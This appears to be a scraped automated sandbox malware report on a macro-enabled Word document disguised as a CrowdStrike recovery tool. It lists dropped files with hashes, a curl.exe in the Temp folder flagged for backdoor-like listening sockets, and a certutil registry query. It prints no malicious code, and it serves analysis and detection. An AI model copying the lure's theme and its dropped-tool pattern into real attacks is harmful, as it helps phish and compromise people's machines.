Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4DBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_000000013F4DBAFC

Source: C:\Windows\System32\certutil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	7_2_000000013F4A2B14
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4CF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	7_2_000000013F4CF964
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F322B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	22_2_000000013F322B14
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F34F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	22_2_000000013F34F964

ID:	1478411
Product:	CloudBasic
Start time:	15:50:15
Start date:	22.07.2024
Sample:	New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	dd2100dfa067caae416b885637adc4ef
SHA1:	499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256:	803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Filetype:	Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41D51BF0.jpg	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x744, components 3	45C59288E77195B7C14579CD59717986	AEF3C27DB85493C0E85CAD04E301C092640E7684	C4AFC369DC15759D81E8563052CFDA5D04EF6B7F76177EB01AA4C2695CB1486F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B853177E.jpg	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x518, components 3	54A07C35DADB508F554F0ED25AA155B3	84FAC4D81E2AF4E920E4971F8A5D53AC4A8C6BDA	94EE01362EE9EE7E61A1A62BD197CFF851A64B1DE02AAFE24C1E0A464E4A6036
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2E26567.jpg	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 838x340, components 3	D76D9D62CD9BDB3201F8B08A60DDD681	A0A5A65424C08AD3C165B72DCC790F5682149DA2	5B00B1362C95117CC1FBD59F3248ACF3F4DFE6F86D11999ECDEE9458F04E17E9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB640B31.jpg	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 837x754, components 3	FA62B61B2E012E56787AD09FF660B32A	32F29245140B72BD99D4C42408EDA9DFE4F088CC	643C921D41C123EB27A5BED51AF0F611EA7ECB4EFD3A5FA34DE8FFBC8F5781FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp	Microsoft Word 2007+	747F920591F171BA793209DB3BFD8A21	BCF601F9500A6B5C20DB101840F4288D685FC57D	74C3C074A163990B2E25692F8656F2232B9D4B07D0B34FE7A3F40127F6838CF3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp	Microsoft Word 2007+	891E6C7EC5DE6384509564D8A0DEDECF	187994C9D8A21DD977473EF8E7A6EF4C7F2EAE52	1E224B11854CE62115305CE613169DAD1C4AA59D35C8482E979532ADCA124A10
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp	Composite Document File V2 Document, Cannot read section info	7911062030D6DA09593877F2B52686EC	04AA8A751201A7373844A0AD9CA64403FADE98DA	5D9BF8B45FB2E025C833D6A12BF29CC1C7F3DE7315E57A893354C826BD5A0207
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{68411966-DD48-4946-AB3B-864E53BCEEA6}.tmp	data	030A4F48DC8DB0956ADD25994004E5CA	D81C6AFAF95FA3886685DF4F9F7D93F4F403226C	FA569E2360C540E6280E34A4627516770F1A5F34D81D35689334A99CC1013357
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp	Targa image data - Map 6 x 7 x 8 +4 +5 "\011"	6156FD728E0A9488C31DF5BBC8F844BF	16B20A75C6113409F1E78A1B66B1E2B647713DE2	07C1401BCA0B13228AFF72314F6247F60A105492B695E817EE2A784643644DA5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9512A27C-373D-4C6D-8C25-ECB66CCA249E}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CD9FBDB6-0620-4DF5-9AD1-8E60378C9E3C}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp	Targa image data - Map 6 x 7 x 8 +4 +5 "\011"	6156FD728E0A9488C31DF5BBC8F844BF	16B20A75C6113409F1E78A1B66B1E2B647713DE2	07C1401BCA0B13228AFF72314F6247F60A105492B695E817EE2A784643644DA5
C:\Users\user\AppData\Local\Temp\curl.exe	PE32+ executable (console) x86-64, for MS Windows	EAC53DDAFB5CC9E780A7CC086CE7B2B1	C9ECDE4DE3C60F99C69BBCA4332F4162E0BF252F	D76D08C04DFA434DE033CA220456B5B87E6B3F0108667BD61304142C54ADDBE4
C:\Users\user\AppData\Local\Temp\curl.txt	PEM certificate	6CD8C188A2B0A5A11B2F02648B675874	11F8F207DA2F2B64E8A978B37BC091DA25B380C4	B27A847F5059294E8E6F9C8B939C0437173C73E0194CF03CDCE4092A025B0C8F
C:\Users\user\AppData\Local\Temp\msoAB8B.tmp	GIF image data, version 89a, 15 x 15	ED3C1C40B68BA4F40DB15529D5443DEC	831AF99BB64A04617E0A42EA898756F9E0E0BCCA	039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
C:\Users\user\AppData\Local\Temp\msoAFEE.tmp	GIF image data, version 89a, 15 x 15	ED3C1C40B68BA4F40DB15529D5443DEC	831AF99BB64A04617E0A42EA898756F9E0E0BCCA	039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:13 2023, mtime=Fri Aug 11 15:42:13 2023, atime=Mon Jul 22 12:51:17 2024, length=250145, window=hide	8080A08A9762D4028FCFCD91E287A9A6	DCF3276796F1F251023389829C817EEF32BE9771	9A68761F2A1D1574751C6C3E59C30A8BB361102A2F17F0F9F54133A1992CE3DD
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	Generic INItialization configuration [folders]	87E4B3E63F6FD43B41CB6BC643DAA68C	624BF01A26B59C2888129E771AF3579FFF15934F	A496015FB1BF4656E45CB323ADEFB73534FA599934A83E4EB8CDEC9751A98353
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	C4615A023DC40AFFAEAE6CF07410BB43	AAE1D68C4082CABF6AEA71C7981F32928CE01843	103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	data	C4615A023DC40AFFAEAE6CF07410BB43	AAE1D68C4082CABF6AEA71C7981F32928CE01843	103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
C:\Users\user\Downloads\52476a0b-6f03-45bf-aedd-6e44c7981759.tmp	Zip archive data, at least v2.0 to extract, compression method=deflate	9C4B364491E6AF11CC33DF28C33C4216	4A0F078995949E9FC29BCE9437EB902BB32D462B	30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)	Zip archive data, at least v2.0 to extract, compression method=deflate	9C4B364491E6AF11CC33DF28C33C4216	4A0F078995949E9FC29BCE9437EB902BB32D462B	30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
C:\Users\user\Downloads\Unconfirmed 830279.crdownload (copy)	Zip archive data, at least v2.0 to extract, compression method=deflate	9C4B364491E6AF11CC33DF28C33C4216	4A0F078995949E9FC29BCE9437EB902BB32D462B	30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
Chrome Cache Entry: 97	Zip archive data, at least v2.0 to extract, compression method=deflate	9C4B364491E6AF11CC33DF28C33C4216	4A0F078995949E9FC29BCE9437EB902BB32D462B	30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm